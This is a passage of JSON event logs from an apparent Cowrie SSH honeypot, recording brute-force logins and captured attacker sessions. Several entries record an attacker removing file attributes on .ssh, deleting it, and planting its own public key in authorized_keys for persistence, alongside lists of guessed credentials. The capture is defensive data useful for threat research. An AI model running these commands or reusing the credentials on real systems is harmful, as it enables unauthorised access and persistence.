cm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:59:01.909926Z","src_ip":"129.226.183.73","session":"faba08c12832"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:59:03.021031Z","src_ip":"129.226.183.73","session":"faba08c12832"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:59:03.295449Z","src_ip":"129.226.183.73","session":"7b350ea5258e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:59:03.296643Z","src_ip":"129.226.183.73","session":"faba08c12832"}
{"eventid":"cowrie.session.closed","duration":30.63427710533142,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:59:12.984543Z","src_ip":"1.164.219.248","session":"b9a9f2cbb2c3"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":33962,"dst_ip":"1.2.3.4","dst_port":22,"session":"f02ab4d26d19","protocol":"ssh","message":"New connection: 129.226.183.73:33962 (1.2.3.4:22) [session: f02ab4d26d19]","sensor":"my-vps","timestamp":"2025-08-24T21:00:01.699175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:00:01.706159Z","src_ip":"129.226.183.73","session":"f02ab4d26d19"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:00:01.979865Z","src_ip":"129.226.183.73","session":"f02ab4d26d19"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"vpn@123","message":"login attempt [vpn/vpn@123] failed","sensor":"my-vps","timestamp":"2025-08-24T21:00:03.113649Z","src_ip":"129.226.183.73","session":"f02ab4d26d19"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:00:04.395776Z","src_ip":"129.226.183.73","session":"f02ab4d26d19"}
{"eventid":"cowrie.session.connect","src_ip":"60.221.239.232","src_port":50246,"dst_ip":"1.2.3.4","dst_port":22,"session":"075ddb67f81c","protocol":"ssh","message":"New connection: 60.221.239.232:50246 (1.2.3.4:22) [session: 075ddb67f81c]","sensor":"my-vps","timestamp":"2025-08-24T21:00:43.223267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:00:43.224646Z","src_ip":"60.221.239.232","session":"075ddb67f81c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:00:43.424049Z","src_ip":"60.221.239.232","session":"075ddb67f81c"}
{"eventid":"cowrie.login.failed","username":"tao","password":"123456","message":"login attempt [tao/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T21:00:44.263302Z","src_ip":"60.221.239.232","session":"075ddb67f81c"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":59364,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b18465e4916","protocol":"ssh","message":"New connection: 129.226.183.73:59364 (1.2.3.4:22) [session: 0b18465e4916]","sensor":"my-vps","timestamp":"2025-08-24T21:01:06.195563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:01:06.200056Z","src_ip":"129.226.183.73","session":"0b18465e4916"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:01:06.453644Z","src_ip":"129.226.183.73","session":"0b18465e4916"}
{"eventid":"cowrie.login.failed","username":"bin","password":"bin","message":"login attempt [bin/bin] failed","sensor":"my-vps","timestamp":"2025-08-24T21:01:07.488810Z","src_ip":"129.226.183.73","session":"0b18465e4916"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:01:08.755679Z","src_ip":"129.226.183.73","session":"0b18465e4916"}
{"eventid":"cowrie.session.connect","src_ip":"161.132.51.215","src_port":50676,"dst_ip":"1.2.3.4","dst_port":23,"session":"4224378ad450","protocol":"telnet","message":"New connection: 161.132.51.215:50676 (1.2.3.4:23) [session: 4224378ad450]","sensor":"my-vps","timestamp":"2025-08-24T21:01:29.506902Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56530,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e4d294b6599","protocol":"ssh","message":"New connection: 217.72.205.35:56530 (1.2.3.4:22) [session: 6e4d294b6599]","sensor":"my-vps","timestamp":"2025-08-24T21:01:51.795513Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:01:51.796656Z","src_ip":"217.72.205.35","session":"6e4d294b6599"}
{"eventid":"cowrie.session.closed","duration":30.695212602615356,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:02:00.201883Z","src_ip":"161.132.51.215","session":"4224378ad450"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":56552,"dst_ip":"1.2.3.4","dst_port":22,"session":"38ef523c3902","protocol":"ssh","message":"New connection: 129.226.183.73:56552 (1.2.3.4:22) [session: 38ef523c3902]","sensor":"my-vps","timestamp":"2025-08-24T21:02:11.759569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:02:11.762639Z","src_ip":"129.226.183.73","session":"38ef523c3902"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:02:12.029237Z","src_ip":"129.226.183.73","session":"38ef523c3902"}
{"eventid":"cowrie.login.success","username":"root","password":"63a9f0ea7bb98050796b649e85481845","message":"login attempt [root/63a9f0ea7bb98050796b649e85481845] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:02:13.095157Z","src_ip":"129.226.183.73","session":"38ef523c3902"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:02:13.702740Z","src_ip":"129.226.183.73","session":"38ef523c3902"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:02:13.703733Z","src_ip":"129.226.183.73","session":"38ef523c3902"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:02:13.705051Z","src_ip":"129.226.183.73","session":"38ef523c3902"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:02:13.972355Z","src_ip":"129.226.183.73","session":"38ef523c3902"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:02:14.524653Z","src_ip":"129.226.183.73","session":"38ef523c3902"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:02:14.525478Z","src_ip":"129.226.183.73","session":"38ef523c3902"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:02:14.797175Z","src_ip":"129.226.183.73","session":"38ef523c3902"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:02:14.798496Z","src_ip":"129.226.183.73","session":"38ef523c3902"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":57732,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a4ff7f8913b","protocol":"ssh","message":"New connection: 129.226.183.73:57732 (1.2.3.4:22) [session: 2a4ff7f8913b]","sensor":"my-vps","timestamp":"2025-08-24T21:02:15.061920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:02:15.071644Z","src_ip":"129.226.183.73","session":"2a4ff7f8913b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:02:15.336554Z","src_ip":"129.226.183.73","session":"2a4ff7f8913b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:02:16.406323Z","src_ip":"129.226.183.73","session":"2a4ff7f8913b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:02:17.682196Z","src_ip":"129.226.183.73","session":"2a4ff7f8913b"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":59100,"dst_ip":"1.2.3.4","dst_port":22,"session":"c27604719b61","protocol":"ssh","message":"New connection: 129.226.183.73:59100 (1.2.3.4:22) [session: c27604719b61]","sensor":"my-vps","timestamp":"2025-08-24T21:02:17.933995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:02:17.935835Z","src_ip":"129.226.183.73","session":"c27604719b61"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:02:18.195957Z","src_ip":"129.226.183.73","session":"c27604719b61"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:02:19.226371Z","src_ip":"129.226.183.73","session":"c27604719b61"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:02:19.491830Z","src_ip":"129.226.183.73","session":"c27604719b61"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:02:19.493536Z","src_ip":"129.226.183.73","session":"38ef523c3902"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:02:43.248705Z","src_ip":"60.221.239.232","session":"075ddb67f81c"}
{"eventid":"cowrie.session.connect","src_ip":"106.40.188.177","src_port":49963,"dst_ip":"1.2.3.4","dst_port":23,"session":"8d61b5cb92e9","protocol":"telnet","message":"New connection: 106.40.188.177:49963 (1.2.3.4:23) [session: 8d61b5cb92e9]","sensor":"my-vps","timestamp":"2025-08-24T21:02:50.744335Z"}
{"eventid":"cowrie.session.closed","duration":12.724822998046875,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:03:03.469085Z","src_ip":"106.40.188.177","session":"8d61b5cb92e9"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":53736,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8d0a59370c4","protocol":"ssh","message":"New connection: 129.226.183.73:53736 (1.2.3.4:22) [session: e8d0a59370c4]","sensor":"my-vps","timestamp":"2025-08-24T21:03:20.321512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:03:20.329853Z","src_ip":"129.226.183.73","session":"e8d0a59370c4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:03:20.586976Z","src_ip":"129.226.183.73","session":"e8d0a59370c4"}
{"eventid":"cowrie.login.success","username":"root","password":"cy123456.","message":"login attempt [root/cy123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:03:21.630789Z","src_ip":"129.226.183.73","session":"e8d0a59370c4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:03:22.202391Z","src_ip":"129.226.183.73","session":"e8d0a59370c4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:03:22.203197Z","src_ip":"129.226.183.73","session":"e8d0a59370c4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:03:22.204384Z","src_ip":"129.226.183.73","session":"e8d0a59370c4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:03:22.464801Z","src_ip":"129.226.183.73","session":"e8d0a59370c4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:03:22.999226Z","src_ip":"129.226.183.73","session":"e8d0a59370c4"}
